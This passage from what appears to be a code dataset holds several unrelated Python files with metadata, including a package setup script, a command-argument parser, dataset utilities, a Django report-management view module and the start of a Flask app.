['mlx9064x-driver>=1.1.3',\n ]\n\n\nif 
platform.machine().startswith('armv'):\n requires += [\n 'opencv-contrib-python>=3',\n ]\nelse:\n requires += [\n 'opencv-contrib-python>=4',\n ]\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='mlx9064x-blob-detection',\n version=version,\n description='Blob detection for MLX90640-41',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license='Apache License, Version 2.0',\n entry_points = {'console_scripts': ['mlx9064x-blob-detection = examples.mlx90640_opencv_blob_detection:main']},\n install_requires=requires,\n url = 'https://github.com/melexis-fir/mlx9064x-blob-detection-py', # Provide either the link to your github or to your website\n download_url = 'https://github.com/melexis-fir/mlx9064x-blob-detection-py/archive/V'+version+'.tar.gz',\n packages=['examples'],\n classifiers=[\n # complete classifier list: http://pypi.python.org/pypi?%3Aaction=list_classifiers\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: Microsoft :: Windows',\n\t'Operating System :: POSIX',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Topic :: Utilities',\n ],\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1749, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "platform.machine", "line_number": 11, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "426128669", "text": "import re\n\nfrom collections import namedtuple\nfrom typing import Dict, List, Optional, Container, Any, Union, Callable, Set, Iterable\n\n# https://stackoverflow.com/questions/249791/regex-for-quoted-string-with-escaping-quotes\n# https://stackoverflow.com/questions/21105360/regex-find-comma-not-inside-quotes\n# The ` ?` is just so it matches the space after during the replace with blank so there's no double spaces\n\n_param_re = re.compile(\n r'(([a-zA-Z_+/.\\-]+)(!=|>=|<=|>|<|==|=)((\"(?:[^\"\\\\]|\\\\.)*\"|\\'(?:[^\\'\\\\]|\\\\.)*\\'|[^,\\s]+)(,(\"(?:[^\"\\\\]|\\\\.)*\"|\\'(?:[^\\'\\\\]|\\\\.)*\\'|[^,\\s]+))*)) ?')\n# The intention of having both = and == is that they might have different behavior.\n# What that means depends on the usage.\n_param_operator_re = re.compile(r'!=|==|=|>|<|>=|<=')\n_param_argument_re = re.compile(r'(\"(?:[^\"\\\\]|\\\\.)*\"|\\'(?:[^\\'\\\\]|\\\\.)*\\'|[^,\\s]+)')\n_param_string_re = re.compile(r'(\"(?:[^\"\\\\]|\\\\.)*\"|\\'(?:[^\\'\\\\]|\\\\.)*\\')')\n\n_tag_re = re.compile(r'(\\$[^\\s]+) ?')\n\nNamedArgument = namedtuple('NamedArgument', 'name operator value')\nArgumentValue = namedtuple('ArgumentValue', 'value operator')\n\n\ndef _parse_named_argument(arg):\n groups = _param_re.fullmatch(arg).groups()\n name = groups[1]\n operator = groups[2]\n values = [value[1:-1] if _param_string_re.fullmatch(value) else value for value in\n _param_argument_re.findall(groups[3])]\n return NamedArgument(name, operator, values)\n\n\ndef parse_arguments(arg):\n arg = arg.lower()\n named_arguments_parsed = [_parse_named_argument(na[0]) for na in _param_re.findall(arg)]\n arg = _param_re.sub('', arg)\n # 
Technically, the order (named arguments then tags)\n # matters because otherwise a fake tag could appear as a value to a named argument\n tags = [t[1:] for t in _tag_re.findall(arg)]\n arg = _tag_re.sub('', arg)\n named_arguments = {}\n for na in named_arguments_parsed:\n if na.name not in named_arguments:\n named_arguments[na.name] = []\n named_arguments[na.name].append(ArgumentValue(na.value, na.operator))\n return ParsedArguments(arg.strip(), set(tags), named_arguments)\n\n\nclass ArgumentError(Exception):\n pass\n\n\nclass ParsedArguments:\n text_argument: str\n word_arguments: Set[str]\n tag_arguments: Set[str]\n named_arguments: Dict[str, List[ArgumentValue]]\n\n def __init__(self, text: str, tags: Set[str], named_arguments: Dict[str, List[ArgumentValue]]):\n self.text_argument = text\n self.word_arguments = set(text.split())\n self.tag_arguments = tags\n self.named_arguments = named_arguments\n self.used_named_arguments = set()\n self.used_tags = set()\n self.used_words = set()\n\n def word(self, value: str):\n if value in self.word_arguments:\n self.used_words.add(value)\n return True\n return False\n\n def words(self, values: Optional[Iterable[str]] = None, aliases: Optional[Dict[str, str]] = None):\n results = set()\n if values is not None:\n for value in values:\n if value in self.word_arguments:\n results.add(value)\n self.used_words.add(value)\n if aliases is not None:\n for alias, value in aliases.items():\n if alias in self.word_arguments:\n results.add(value)\n self.used_words.add(alias)\n return results\n\n def text(self):\n return ' '.join(word for word in self.text_argument.split() if word not in self.used_words)\n\n def tag(self, name: str):\n if name in self.tag_arguments:\n self.used_tags.add(name)\n return True\n return False\n\n def tags(self, names: Optional[Iterable[str]] = None, aliases: Optional[Dict[str, str]] = None):\n results = set()\n if names is not None:\n for name in names:\n if name in self.tag_arguments:\n results.add(name)\n self.used_tags.add(name)\n if aliases is not None:\n for alias, value in aliases.items():\n if alias in self.tag_arguments:\n results.add(value)\n self.used_tags.add(alias)\n return results\n\n def has_named(self, name: str):\n return name in self.named_arguments\n\n def single(self, names: Union[List[str], str], default: Any = None, allowed_operators: Optional[Container] = None,\n is_list=False, numeric=False, converter: Union[dict, Callable] = lambda n: n):\n if allowed_operators is None:\n allowed_operators = {'>', '<', '>=', '<=', '!=', '==', '='}\n if not isinstance(default, tuple):\n default = ArgumentValue(default, '=')\n if not isinstance(names, list):\n names = [names]\n for name in names:\n self.used_named_arguments.add(name)\n name = f'{names[0]} ({\", \".join(names[1:])})' if len(names) > 1 else names[0]\n value = [arg for args in (self.named_arguments.get(name) for name in names) if args for arg in args]\n if not value:\n return default\n if len(value) != 1:\n raise ArgumentError(f'Expected only one value for parameter \"{name}\".')\n value = value[0]\n if value.operator not in allowed_operators:\n raise ArgumentError(\n f'Allowed operators for parameter \"{name}\" are {\", \".join(str(o) for o in allowed_operators)}.')\n if numeric:\n try:\n value = ArgumentValue([float(v) for v in value.value], value.operator)\n except ValueError:\n raise ArgumentError(f'Expected numerical arguments for parameter \"{name}\".')\n try:\n if isinstance(converter, dict):\n value = ArgumentValue([converter[v] for v in value.value], 
value.operator)\n else:\n value = ArgumentValue([converter(v) for v in value.value], value.operator)\n except Exception:\n raise ArgumentError(f'Invalid value for parameter \"{name}\".')\n if not is_list:\n if len(value.value) != 1:\n raise ArgumentError(f'List not allowed for parameter \"{name}\".')\n value = ArgumentValue(value.value[0], value.operator)\n return value\n\n def repeatable(self, names: Union[List[str], str], default: Any = None,\n allowed_operators: Optional[Container] = None,\n is_list=False, numeric=False, converter: Union[dict, Callable] = lambda n: n):\n if allowed_operators is None:\n allowed_operators = {'>', '<', '>=', '<=', '!=', '==', '='}\n if not isinstance(default, tuple) and default is not None:\n default = [ArgumentValue(default, '=')]\n if default is None:\n default = []\n if not isinstance(names, list):\n names = [names]\n for name in names:\n self.used_named_arguments.add(name)\n name = f'{names[0]} ({\", \".join(names[1:])})' if len(names) > 1 else names[0]\n values = [arg for args in (self.named_arguments.get(name) for name in names) if args for arg in args]\n if not values:\n return default\n if any(value.operator not in allowed_operators for value in values):\n raise ArgumentError(\n f'Allowed operators for parameter \"{name}\" are {\", \".join(str(o) for o in allowed_operators)}.')\n if numeric:\n try:\n values = [ArgumentValue([float(v) for v in value.value], value.operator) for value in values]\n except ValueError:\n raise ArgumentError(f'Expected numerical arguments for parameter \"{name}\".')\n try:\n if isinstance(converter, dict):\n values = [ArgumentValue([converter[v] for v in value.value], value.operator) for value in values]\n else:\n values = [ArgumentValue([converter(v) for v in value.value], value.operator) for value in values]\n except Exception:\n raise ArgumentError(f'Invalid value for parameter \"{name}\".')\n if not is_list:\n if any(len(value.value) != 1 for value in values):\n raise ArgumentError(f'List not allowed for parameter \"{name}\".')\n values = [ArgumentValue(value.value[0], value.operator) for value in values]\n return values\n\n def has_unused(self):\n return self.has_unused_named_arguments() or self.has_unused_tags()\n\n def has_unused_named_arguments(self):\n return any(name not in self.used_named_arguments for name in self.named_arguments.keys())\n\n def has_unused_tags(self):\n return any(t not in self.used_tags for t in self.tag_arguments)\n\n def require_all_arguments_used(self):\n def quote(s):\n return f'\"{s}\"'\n\n if self.has_unused_named_arguments():\n raise ArgumentError(\n f'Unknown arguments with names {\", \".join(quote(v) for v in self.named_arguments.keys() if v not in self.used_named_arguments)}.')\n if self.has_unused_tags():\n raise ArgumentError(\n f'Unknown tags {\", \".join(quote(v) for v in self.tag_arguments if v not in self.used_tags)}.')\n\n\n_operators = {\n '=': lambda a, b: a == b,\n '==': lambda a, b: a == b,\n '!=': lambda a, b: a != b,\n '>': lambda a, b: a > b,\n '<': lambda a, b: a < b,\n '>=': lambda a, b: a >= b,\n '<=': lambda a, b: a <= b,\n}\n\n_list_operators = {\n '=': lambda a, b: any(a == v for v in b),\n '==': lambda a, b: all(a == v for v in b),\n '!=': lambda a, b: all(a != v for v in b),\n '>': lambda a, b: all(a > v for v in b),\n '<': lambda a, b: all(a < v for v in b),\n '>=': lambda a, b: all(a >= v for v in b),\n '<=': lambda a, b: all(a <= v for v in b),\n}\n\n\ndef operator_for(operator: str):\n return _operators[operator]\n\n\ndef list_operator_for(operator: str):\n 
return _list_operators[operator]\n", "sub_path": "miyu_bot/commands/common/argument_parsing.py", "file_name": "argument_parsing.py", "file_ext": "py", "file_size_in_byte": 9938, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.compile", "line_number": 10, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 14, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 18, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 20, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 21, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Container", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 115, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 115, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 152, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 152, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 152, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.Container", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 154, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "549971208", "text": "\n# from: https://stackoverflow.com/questions/17909294/python-argparse-mutual-exclusive-group\n\nimport argparse\n\n\nif __name__ == '__main__':\n # create the top-level parser\n parser = argparse.ArgumentParser(prog='PROG')\n parser.add_argument('--foo', action='store_true', help='help for foo arg.')\n subparsers = parser.add_subparsers(help='help for subcommand')\n\n # create the parser for the \"command_1\" command\n parser_a = subparsers.add_parser('command_1', help='command_1 help')\n parser_a.add_argument('a', type=str, help='help for bar, positional')\n\n # create the parser for the \"command_2\" command\n parser_b = subparsers.add_parser('command_2', help='help for command_2')\n parser_b.add_argument('-b', type=str, help='help for b')\n 
parser_b.add_argument('-c', type=str, action='store', default='', help='test')", "sub_path": "playground/argparse_test.py", "file_name": "argparse_test.py", "file_ext": "py", "file_size_in_byte": 843, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "498921569", "text": "import pickle\nimport json\nimport os\nimport errno\n\n\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\ndef label2matrix(label):\n labellist = [0] * 312\n for i in label:\n index = int(i)\n labellist[index - 1] = 1\n\n return labellist\n\n\ndef load_imagelist(file_path):\n # image id from 1 to 11788\n image_list = []\n for line in open(file_path):\n line = line.split()\n image_id = line[0]\n file_path = line[1]\n image_dict = {'image_id': image_id, 'file': file_path}\n image_list.append(image_dict)\n return image_list\n\n\ndef load_attributelist(file_path):\n # attribute id from 1 to 312\n attribute_list = []\n for line in open(file_path):\n line = line.split()\n attribute_id = line[0]\n attribute_name = line[1]\n attribute_dict = {'attribute_id': attribute_id, 'attribute_name': attribute_name}\n attribute_list.append(attribute_dict)\n return attribute_list\n\n\ndef load_attributelabels(file_path, attribute_list, image_list):\n dictlist = []\n flag = 0\n for line in open(file_path):\n line = line.split()\n image_id = line[0]\n attribute_id = line[1]\n is_present = line[2]\n attribute_name = attribute_list[int(attribute_id) - 1].get('attribute_name')\n if flag != image_id:\n attribute_temp = []\n flag = image_id\n image_file = image_list[int(flag) - 1].get('file')\n image_file = '/data/image_server/images/CUB/' + image_file\n if is_present == '1':\n attribute_name = attribute_name + '_yes'\n else:\n attribute_name = attribute_name + '_no'\n attribute_temp.append(attribute_name)\n datum = {'image_file': image_file, 'id': attribute_temp}\n dictlist.append(datum)\n else:\n if is_present == '1':\n attribute_name = attribute_name + '_yes'\n else:\n attribute_name = attribute_name + '_no'\n attribute_temp.append(attribute_name)\n return dictlist\n\n\ndef write_data(filepath, attribute_labels):\n f = open(filepath, 'w')\n for item in attribute_labels:\n item = json.dumps(item)\n f.write(item)\n f.write('\\n')\n f.close()\n\n\ndef write_label(filepath, attribute_list):\n f = open(filepath, 'w')\n for item in attribute_list:\n attribute_name = item['attribute_name']\n f.writelines([str(2), ';', str(attribute_name), ';', str(attribute_name), '\\n'])\n attribute_value = item['attribute_name']\n f.writelines([str(attribute_value), '_yes', ';', str(attribute_value), '_yes', '\\n'])\n f.writelines([str(attribute_value), '_no', ';', str(attribute_value), '_no', '\\n'])\n\n\nif __name__ == '__main__':\n attributelist = load_attributelist('attributes.txt')\n imagelist = load_imagelist('images.txt')\n labellist = load_attributelabels('image_attribute_labels.txt', attributelist, imagelist)\n write_data('data.txt', labellist)\n write_label('labels.txt', attributelist)\n", "sub_path": "util/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 3217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.makedirs", "line_number": 9, "usage_type": "call"}, {"api_name": "errno.EEXIST", 
"line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "4486989", "text": "from django.apps import registry\nfrom QYManufacture import models as mo\nAPPCONFIG = registry.apps.get_app_config('QYManufacture')\nimport openpyxl\n\n\n\ndef xlsx_parse(bfp, pID=0):\n \"\"\"解析用户上传的xlsx文件。本函数只负责\n\n Args:\n bfp (fp):从POST域中读取到的内存文件\n\n Kwargs:\n pID (int):组件关联项目的ID\n\n Returns:\n dict. 未经检查的序列化数据 \n\n \"\"\"\n\n path = ''\n head = ['productClass', 'sizeNote', '', 'dupilicationNo',\n '', '', 'note', 'systemNote', 'batch']\n out = []\n with open(APPCONFIG.TEMP_PATH+\"/.temp.xlsx\", \"wb\") as fp:\n for chunk in bfp.chunks():\n fp.write(chunk)\n path = fp.name\n\n ws = openpyxl.load_workbook(path).active\n for row in ws.iter_rows(min_row=2, max_col=9):\n data = [x.value for x in row]\n data = dict(zip(head, data))\n data[\"drawings\"] = None\n data['project'] = pID\n data['status'] = mo.Components.CREATED\n data.pop('')\n out.append(data)\n return out\n", "sub_path": "QYmaintenance/QYManufacture/backEndScript/conponentCSVparser.py", "file_name": "conponentCSVparser.py", "file_ext": "py", "file_size_in_byte": 1058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.apps.registry.apps.get_app_config", "line_number": 3, "usage_type": "call"}, {"api_name": "django.apps.registry.apps", "line_number": 3, "usage_type": "attribute"}, {"api_name": "django.apps.registry", "line_number": 3, "usage_type": "name"}, {"api_name": "openpyxl.load_workbook", "line_number": 31, "usage_type": "call"}, {"api_name": "QYManufacture.models.Components", "line_number": 37, "usage_type": "attribute"}, {"api_name": "QYManufacture.models", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "365000871", "text": "from imp import find_module, load_module\nfrom logging import getLogger\n\nfrom . 
import settings\nfrom .clients import get_bundles\nfrom .exceptions import BundleError\nfrom .plugins import CONFIG_ITEM_CLASSES, load_plugins\n\nLOG = getLogger(__name__)\n\nclass AbstractConfiguration(object):\n \"\"\"\n Represents everything we know about the system we're dealing with.\n \"\"\"\n def __init__(self, node, metadata):\n self.bundles = []\n for group in metadata.groups:\n self.bundles += get_bundles(group)\n LOG.debug(\"got bundles for {}: {}\".format(\n node.metadata.name,\n \", \".join(self.bundles),\n ))\n \n self.config_items = {}\n load_plugins()\n \n bundle_modules = []\n for bundle_name in self.bundles:\n try:\n (f, pathname, description) = find_module(\n bundle_name,\n [settings.BUNDLE_PATH],\n )\n except ImportError:\n LOG.error(\"loading bundle failed: {}\".format(bundle_name))\n raise\n try:\n module = load_module(bundle_name, f, pathname, description)\n bundle_modules.append(module)\n LOG.debug(\"loaded bundle: \" + bundle_name)\n finally:\n f.close()\n \n for bundle_attribute, config_item in CONFIG_ITEM_CLASSES.items():\n self.config_items[bundle_attribute] = {}\n \n for bundle_module in bundle_modules:\n if not hasattr(bundle_module, bundle_attribute):\n LOG.debug(\"no {} found on bundle {}\".format(\n bundle_attribute,\n bundle_module,\n ))\n continue\n config_item_dict = getattr(bundle_module, bundle_attribute)\n \n if not isinstance(config_item_dict, dict):\n msg = \"'{}' attribute in bundle {} \" \\\n \"is not a dictionary\".format(\n bundle_attribute,\n bundle_module,\n )\n LOG.error(msg)\n raise BundleError(msg)\n \n for name, abstract_info in config_item_dict.items():\n LOG.debug(\"found config item '{}:{}' \"\n \"in bundle {}\".format(\n config_item.__name__,\n name,\n bundle_module,\n ))\n \n config_item.validate_abstract_input_full(name, abstract_info)\n \n self.config_items[bundle_attribute][name] = abstract_info\n", "sub_path": "src/blockwart/abstract.py", "file_name": "abstract.py", "file_ext": "py", "file_size_in_byte": 2805, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "clients.get_bundles", "line_number": 18, "usage_type": "call"}, {"api_name": "plugins.load_plugins", "line_number": 25, "usage_type": "call"}, {"api_name": "imp.find_module", "line_number": 30, "usage_type": "call"}, {"api_name": "imp.load_module", "line_number": 38, "usage_type": "call"}, {"api_name": "plugins.CONFIG_ITEM_CLASSES.items", "line_number": 44, "usage_type": "call"}, {"api_name": "plugins.CONFIG_ITEM_CLASSES", "line_number": 44, "usage_type": "name"}, {"api_name": "exceptions.BundleError", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "374245240", "text": "import os\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom projects.models import Project, ProjectLog\nfrom .forms import ReportGeneratorForm\nfrom .models import Report, ReportGenerator\nfrom django.db.models import Q\nfrom .helpers import get_visualiser_file\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n@login_required(login_url='/accounts/login')\ndef index(request, user, project):\n template = 'reports_list.html'\n\n project = Project.objects.filter(slug=project).first()\n reports = ReportGenerator.objects.filter(project=project).order_by('-created_at')\n\n return render(request, template, 
locals())\n\n\n@login_required(login_url='/accounts/login')\ndef add(request, user, project):\n project = Project.objects.filter(slug=project).first()\n\n url = 'http://{}-file-controller/reports'.format(project.slug)\n import requests\n report_generators = []\n try:\n response = requests.get(url)\n if response.status_code == 200 or response.status_code == 203:\n payload = response.json()\n if payload['status'] == 'OK':\n for file in payload['generators']:\n report_generators.append(file['name'])\n except Exception as e:\n logger.error(\"Failed to get response from {} with error: {}\".format(url, e))\n\n if request.method == 'POST':\n form = ReportGeneratorForm(request.POST)\n\n if form.is_valid():\n obj = form.save()\n\n l = ProjectLog(project=project, module='RE', headline='Metrics',\n description='A new Generator {id} has been added'.format(id=obj.pk))\n l.save()\n\n get_visualiser_file(project.pk, obj.visualiser)\n\n url = '/{}/{}/reports/{}'.format(request.user, project.slug, obj.pk)\n else:\n url = '/{}/{}/reports/'.format(request.user, project.slug)\n\n return HttpResponseRedirect(url)\n else:\n form = ReportGeneratorForm({'project': project.id})\n\n return render(request, 'reports_add.html', locals())\n\n\n@login_required(login_url='/accounts/login')\ndef details(request, user, project, id):\n template = 'reports_details_generator.html'\n\n project = Project.objects.filter(slug=project).first()\n report = ReportGenerator.objects.filter(id=id).first()\n\n return render(request, template, locals())\n\n\n@login_required(login_url='/accounts/login')\ndef visualize_report(request, user, project, id):\n template = 'reports_details.html'\n\n project = Project.objects.filter(slug=project).first()\n report = Report.objects.filter(id=id).first()\n\n filename = 'report_{}.png'.format(id)\n\n reports_compare = Report.objects.filter(~Q(id=id))\n\n return render(request, template, locals())\n\n\ndef visualize_report_public(request, id):\n template = 'reports_details_public.html'\n\n report = Report.objects.filter(pk=id).first()\n\n filename = 'report_{}.png'.format(id)\n\n reports_compare = Report.objects.filter(~Q(id=id))\n\n return render(request, template, locals())\n\n\n@login_required(login_url='/accounts/login')\ndef delete_generator(request, user, project, id):\n project = Project.objects.filter(slug=project).first()\n report = ReportGenerator.objects.filter(id=id).first()\n\n path = 'reports/{}'.format(report.visualiser)\n\n if request.method == \"POST\":\n if os.path.exists(path):\n os.unlink(path)\n\n l = ProjectLog(project=project, module='RE', headline='Metrics',\n description='Generator {id} has been removed'.format(id=report.pk))\n l.save()\n\n report.delete()\n\n return HttpResponseRedirect('/{}/{}/reports/'.format(request.user, project.slug))\n\n return render(request, 'report_confirm_delete.html', locals())\n\n\n@login_required(login_url='/accounts/login')\ndef delete_report(request, user, project, id):\n project = Project.objects.filter(slug=project).first()\n report = Report.objects.filter(id=id).first()\n\n path = 'reports/report_{}.png'.format(id)\n\n if request.method == \"POST\":\n if os.path.exists(path):\n os.unlink(path)\n\n l = ProjectLog(project=project, module='RE', headline='Metrics',\n description='Metrics {id} has been removed'.format(id=report.pk))\n l.save()\n\n report.delete()\n\n return HttpResponseRedirect('/{}/{}/models/'.format(request.user, project.slug))\n\n return render(request, 'report_confirm_delete.html', locals())\n", "sub_path": 
"components/studio/reports/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4541, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 19, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 19, "usage_type": "name"}, {"api_name": "models.ReportGenerator.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "models.ReportGenerator.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.ReportGenerator", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 15, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 27, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 27, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "forms.ReportGeneratorForm", "line_number": 43, "usage_type": "call"}, {"api_name": "projects.models.ProjectLog", "line_number": 48, "usage_type": "call"}, {"api_name": "helpers.get_visualiser_file", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 58, "usage_type": "call"}, {"api_name": "forms.ReportGeneratorForm", "line_number": 60, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 25, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 69, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 69, "usage_type": "name"}, {"api_name": "models.ReportGenerator.objects.filter", "line_number": 70, "usage_type": "call"}, {"api_name": "models.ReportGenerator.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "models.ReportGenerator", "line_number": 70, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 72, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 65, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 79, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 79, "usage_type": "name"}, {"api_name": "models.Report.objects.filter", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Report.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.Report", "line_number": 80, "usage_type": "name"}, {"api_name": "models.Report.objects.filter", "line_number": 84, "usage_type": "call"}, {"api_name": "models.Report.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "models.Report", "line_number": 84, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 84, "usage_type": 
"call"}, {"api_name": "django.shortcuts.render", "line_number": 86, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 75, "usage_type": "call"}, {"api_name": "models.Report.objects.filter", "line_number": 92, "usage_type": "call"}, {"api_name": "models.Report.objects", "line_number": 92, "usage_type": "attribute"}, {"api_name": "models.Report", "line_number": 92, "usage_type": "name"}, {"api_name": "models.Report.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "models.Report.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "models.Report", "line_number": 96, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 96, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 98, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 103, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 103, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 103, "usage_type": "name"}, {"api_name": "models.ReportGenerator.objects.filter", "line_number": 104, "usage_type": "call"}, {"api_name": "models.ReportGenerator.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.ReportGenerator", "line_number": 104, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 110, "usage_type": "call"}, {"api_name": "projects.models.ProjectLog", "line_number": 112, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 118, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 101, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 125, "usage_type": "name"}, {"api_name": "models.Report.objects.filter", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Report.objects", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.Report", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 132, "usage_type": "call"}, {"api_name": "projects.models.ProjectLog", "line_number": 134, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 140, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 142, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 123, "usage_type": "call"}]} +{"seq_id": "551916446", "text": "from flask import Flask, render_template, url_for, request, jsonify\nfrom flask_material import Material \nimport simplejson as json\nimport pandas as pd \nimport numpy as np \nfrom joblib import dump, load\nimport keras\nfrom keras import backend as K\nimport tensorflow as tf\nfrom sklearn.preprocessing import StandardScaler,MinMaxScaler\n\n\n\napp = 